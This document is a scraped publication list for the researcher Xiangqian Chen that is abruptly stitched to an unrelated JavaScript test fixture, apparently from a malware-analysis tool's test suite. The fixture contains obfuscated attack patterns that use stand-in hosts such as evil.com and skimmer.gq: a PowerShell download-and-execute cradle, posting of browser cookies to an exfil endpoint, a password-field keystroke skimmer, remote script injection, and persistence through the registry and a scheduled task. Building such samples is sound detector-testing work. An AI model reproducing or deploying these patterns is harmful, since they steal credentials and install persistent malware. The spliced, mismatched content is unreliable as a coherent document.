Xiangqian Chen

14 papers B 1C 1Journal 6Unranked 6
YearRankTypeTitle / Venue / Authors
2025 J jnl
Displays
Yabao Zhuang, Liquan Zhu, Yuhua Yang, Long He, Xiangqian Chen, Lixin Xu
2025 J jnl
IEEE Robotics Autom. Lett.
Xingguang Duan, Rui He, Qingjie Zhao, Xiangqian Chen, Changsheng Li
2024 conf
ICSR + BioMed
Hao Wen, Rui He, Xiangqian Chen, Changsheng Li, Xingguang Duan
2023 conf
ICDL
Xiangqian Chen, Di Liu, Lihong Wan, Simone Baldi
2021 conf
ICIRA (3)
Rui He, Hao Wen, Changsheng Li, Xiangqian Chen, Xiaogang Chen, Xiaowei Mao, Xingguang Duan
2020 conf
EMBC
Yadong Yan, Yu Wang, Xiangqian Chen, Chao Shi, Jiazheng Yu, Chang Cheng
2020 J jnl
Medical Biol. Eng. Comput.
Xiangqian Chen, Yu Wang, Gang Zhu, Weijun Zhang, Gang Zhou, Yubo Fan
2020 conf
EMBC
Chao Shi, Gang Zhu, Yadong Yan, Xiangqian Chen, Yu Wang, Kaicheng U
2019 J jnl
Complex.
Mingyue Tan, Jiming Li, Xiangqian Chen, Xuezhen Cheng
2009 J jnl
IEEE Commun. Surv. Tutorials
Xiangqian Chen, Kia Makki, Kang Yen, Niki Pissinou
2008 B conf
LCN
Xiangqian Chen, Kia Makki, Kang Yen, Niki Pissinou, Zhihua Liu
2008 J jnl
EURASIP J. Wirel. Commun. Netw.
Xiangqian Chen, Kia Makki, Kang K. Yen, Niki Pissinou
2007 conf
ICN
Xiangqian Chen, Kia Makki, Kang Yen, Niki Pissinou
2007 C conf
ISCC
Xiangqian Chen, Kia Makki, Kang Yen, Niki Pissinou
test_files/test_malicious.js
← Index test_files/test_malicious.js javascript
// Simulated malicious JavaScript sample for testing REDB JS extractors
// This file contains common malware patterns for analysis validation

var _0x4a2f = ["\x68\x74\x74\x70\x3a\x2f\x2f\x65\x76\x69\x6c\x2e\x63\x6f\x6d\x2f\x70\x61\x79\x6c\x6f\x61\x64"];
var _0xb3 = ["\x57\x53\x63\x72\x69\x70\x74"];

// Obfuscated string reconstruction
var cmd = String.fromCharCode(112, 111, 119, 101, 114, 115, 104, 101, 108, 108);
var encoded_payload = "cG93ZXJzaGVsbCAtZXAgYnlwYXNzIC1jICJJRVggKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHA6Ly9ldmlsLmNvbS9zdGFnZTInKSI=";

// WScript-based malware pattern
var shell = WScript.CreateObject("WScript.Shell");
var fso = WScript.CreateObject("Scripting.FileSystemObject");

// Eval-based code execution
eval(function(p, a, c, k, e, d) {
    while (c--) { if (k[c]) { p = p.replace(new RegExp('\\b' + c.toString(a) + '\\b', 'g'), k[c]) } }
    return p
}('1 0="2://3.4/5";', 6, 6, 'url|var|http|malware|example|download'.split('|'), 0, {}));

// Network communication
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://192.168.1.100:8080/exfil", true);
xhr.send(document.cookie);

// File system operations
var stream = WScript.CreateObject("ADODB.Stream");
stream.Open();
stream.Type = 1;

// Registry manipulation
shell.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Updater", "C:\\Users\\Public\\malware.exe");

// Dynamic script injection
var s = document.createElement("script");
s.src = "https://evil-cdn.tk/inject.js";
document.body.appendChild(s);

// DOM skimmer pattern
document.querySelector("input[type=password]").addEventListener("keyup", function(e) {
    fetch("https://skimmer.gq/collect", {
        method: "POST",
        body: JSON.stringify({val: e.target.value})
    });
});

// Crypto miner pattern
var worker = new Worker("data:application/javascript," + atob(encoded_payload));

// Additional obfuscation: concatenated strings
var c2_url = "ht" + "tp" + "://" + "bad" + "guy" + ".r" + "u/" + "gate";

// setTimeout with string execution
setTimeout("eval(atob('" + encoded_payload + "'))", 1000);

function downloadPayload(url) {
    var req = WScript.CreateObject("MSXML2.XMLHTTP");
    req.open("GET", url, false);
    req.send();
    return req.responseText;
}

function persist() {
    shell.Run("cmd.exe /c schtasks /create /tn UpdateCheck /tr C:\\payload.exe /sc daily", 0, false);
    shell.Exec("powershell -ep bypass -c IEX(payload)");
}

downloadPayload(_0x4a2f[0]);
persist();

// Packer-style single-line payload to give the obfuscation heuristic the
// strong-signal evidence it expects from real obfuscator.io output: hex-escape
// density >5% and a max_line >10K chars. The repeat() saturates both.
var _0xpayload="\x68\x74\x74\x70\x3a\x2f\x2f\x65\x76\x69\x6c\x2e\x63\x6f\x6d\x2f\x73\x74\x61\x67\x65\x32\x2e\x6a\x73\x3f\x69\x64\x3d".repeat(800)+"\x22\x49\x45\x58\x28\x4e\x65\x77\x2d\x4f\x62\x6a\x65\x63\x74\x20\x4e\x65\x74\x2e\x57\x65\x62\x43\x6c\x69\x65\x6e\x74\x29\x2e\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x53\x74\x72\x69\x6e\x67\x28\x27\x68\x74\x74\x70\x3a\x2f\x2f\x65\x76\x69\x6c\x2e\x63\x6f\x6d\x2f\x70\x61\x79\x6c\x6f\x61\x64\x27\x29\x22";